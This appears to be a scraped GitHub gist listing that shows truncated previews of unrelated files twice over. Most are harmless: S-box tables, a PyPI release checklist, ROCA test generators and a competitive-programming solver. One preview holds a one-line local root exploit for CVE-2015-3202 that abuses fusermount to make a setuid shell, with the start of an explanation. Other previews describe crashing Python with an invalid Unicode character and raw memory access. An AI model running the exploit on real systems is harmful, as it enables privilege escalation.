Aleksei Udovenko hellman

## deadbeef_character.py
"""
This file contains code that, when run on Python 2.7.5 or earlier, creates
a string that should not exist: u'\Udeadbeef'. That's a single "character"
that's illegal in Python because it's outside the valid Unicode range.

It then uses it to crash various things in the Python standard library and
corrupt a database.

On Python 3... well, this file is full of syntax errors on Python 3. But
if you were to change the print statements and byte literals and stuff:

## sboxes_4bit_ae_classes.py
from sage.crypto.sbox import SBox

# List taken from De Canniere's PhD Thesis
# Available at http://blog.sciencenet.cn/upload/blog/file/2009/3/20093320521938772.pdf

representatives = [
    SBox([0x4, 0x0, 0x1, 0xF, 0x2, 0xB, 0x6, 0x7, 0x3, 0x9, 0xA, 0x5, 0xC, 0xD, 0xE, 0x8]),
    SBox([0x8, 0x0, 0x1, 0xC, 0x2, 0x5, 0x6, 0x9, 0x4, 0x3, 0xA, 0xB, 0x7, 0xD, 0xE, 0xF]),
    SBox([0x8, 0x0, 0x1, 0xC, 0xF, 0x5, 0x6, 0x7, 0x4, 0x3, 0xA, 0xB, 0x9, 0xD, 0xE, 0x2]),
    SBox([0x2, 0x0, 0x1, 0x8, 0x3, 0xD, 0x6, 0x7, 0x4, 0x9, 0xA, 0x5, 0xC, 0xB, 0xE, 0xF]),

## pypi-release-checklist.md

      
              1 file
            
          
              70 forks
            
          
              13 comments
            
          
              274 stars
            
          
                audreyfeldroy
                / pypi-release-checklist.md
            
            
              Last active
              February 23, 2023 15:03
            
              
                My PyPI Release Checklist
              
          
 Update HISTORY.md
 Commit the changes:

git add HISTORY.md
git commit -m "Changelog for upcoming release 0.1.1."


 Update version number (can also be minor or major)

bumpversion patch


## rdwr.py
#
# read/write access to python's memory, using a custom bytearray.
# some code taken from: http://tinyurl.com/q7duzxj
#
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
#
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898

## beautiful_idiomatic_python.md

      
              1 file
            
          
              280 forks
            
          
              29 comments
            
          
              847 stars
            
          
                JeffPaine
                / beautiful_idiomatic_python.md
            
            
              Last active
              January 14, 2023 05:37
            
              
                Moved to: https://github.com/JeffPaine/beautiful_idiomatic_python
              
          
    Moved

Now located at https://github.com/JeffPaine/beautiful_idiomatic_python.
Why it was moved

Github gists don't support Pull Requests or any notifications, which made it impossible for me to maintain this (surprisingly popular) gist with fixes, respond to comments and so on. In the interest of maintaining the quality of this resource for others, I've moved it to a proper repo. Cheers!

  
## roca_test.py
#!/usr/bin/python
import sys

# Credit: https://crypto.stackexchange.com/questions/52292/what-is-fast-prime
generators = [
    (2, 11), (6, 13), (8, 17), (9, 19), (3, 37), (26, 53), (20, 61), (35, 71),
    (24, 73), (13, 79), (6, 97), (51, 103), (53, 107), (54, 109), (42, 127),
    (50, 151), (78, 157),
]

## regdump.c
/*
 * $ gcc -m32 -fPIC -shared -o regdump.so regdump.c
 * $ LD_PRELOAD=$(pwd)/regdump.so ./test
 *
 * Dump register state with 'ud2a' (0F 0B)
 */

#define _GNU_SOURCE
#include <signal.h>
#include <stdlib.h>

## CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.

12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;

# $b is used twice, first to build the contents of shellscript $a, and then as

## 10-description.txt
Description
---
Just matrix chain multiplication.

Input format
---
There may be multiple test cases.
Each test case consists of two lines.
On the first line is an integer, $n$, the number of matrices.
On the second line are $n + 1$ integers, the dimension of the matrices.

## solve.cpp
// g++ -O3 solve.cpp -fopenmp && ./a.out
//
// Credits:
//   Algorithm: @utaha1228
//   Optimization: @sasdf

#include "table.h" // Generated by python3 solve.py
#include <omp.h>
#include <cstdint>
#include <cstdio>
	"""
	This file contains code that, when run on Python 2.7.5 or earlier, creates
	a string that should not exist: u'\Udeadbeef'. That's a single "character"
	that's illegal in Python because it's outside the valid Unicode range.

	It then uses it to crash various things in the Python standard library and
	corrupt a database.

	On Python 3... well, this file is full of syntax errors on Python 3. But
	if you were to change the print statements and byte literals and stuff:
	from sage.crypto.sbox import SBox

	# List taken from De Canniere's PhD Thesis
	# Available at http://blog.sciencenet.cn/upload/blog/file/2009/3/20093320521938772.pdf

	representatives = [
	SBox([0x4, 0x0, 0x1, 0xF, 0x2, 0xB, 0x6, 0x7, 0x3, 0x9, 0xA, 0x5, 0xC, 0xD, 0xE, 0x8]),
	SBox([0x8, 0x0, 0x1, 0xC, 0x2, 0x5, 0x6, 0x9, 0x4, 0x3, 0xA, 0xB, 0x7, 0xD, 0xE, 0xF]),
	SBox([0x8, 0x0, 0x1, 0xC, 0xF, 0x5, 0x6, 0x7, 0x4, 0x3, 0xA, 0xB, 0x9, 0xD, 0xE, 0x2]),
	SBox([0x2, 0x0, 0x1, 0x8, 0x3, 0xD, 0x6, 0x7, 0x4, 0x9, 0xA, 0x5, 0xC, 0xB, 0xE, 0xF]),
	#
	# read/write access to python's memory, using a custom bytearray.
	# some code taken from: http://tinyurl.com/q7duzxj
	#
	# tested on:
	# Python 2.7.10, ubuntu 32bit
	# Python 2.7.8, win32
	#
	# example of correct output:
	# inspecting int=0x41424344, at 0x0228f898
	#!/usr/bin/python
	import sys

	# Credit: https://crypto.stackexchange.com/questions/52292/what-is-fast-prime
	generators = [
	(2, 11), (6, 13), (8, 17), (9, 19), (3, 37), (26, 53), (20, 61), (35, 71),
	(24, 73), (13, 79), (6, 97), (51, 103), (53, 107), (54, 109), (42, 127),
	(50, 151), (78, 157),
	]
	/*
	* $ gcc -m32 -fPIC -shared -o regdump.so regdump.c
	* $ LD_PRELOAD=$(pwd)/regdump.so ./test
	*
	* Dump register state with 'ud2a' (0F 0B)
	*/

	#define _GNU_SOURCE
	#include <signal.h>
	#include <stdlib.h>
	# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.

	12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
	a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

	# Here's how it works, $a holds the name of a shellscript to be executed as
	# root.
	a=/tmp/.$$;

	# $b is used twice, first to build the contents of shellscript $a, and then as
	Description
	---
	Just matrix chain multiplication.

	Input format
	---
	There may be multiple test cases.
	Each test case consists of two lines.
	On the first line is an integer, $n$, the number of matrices.
	On the second line are $n + 1$ integers, the dimension of the matrices.
	// g++ -O3 solve.cpp -fopenmp && ./a.out
	//
	// Credits:
	// Algorithm: @utaha1228
	// Optimization: @sasdf

	#include "table.h" // Generated by python3 solve.py
	#include <omp.h>
	#include <cstdint>
	#include <cstdio>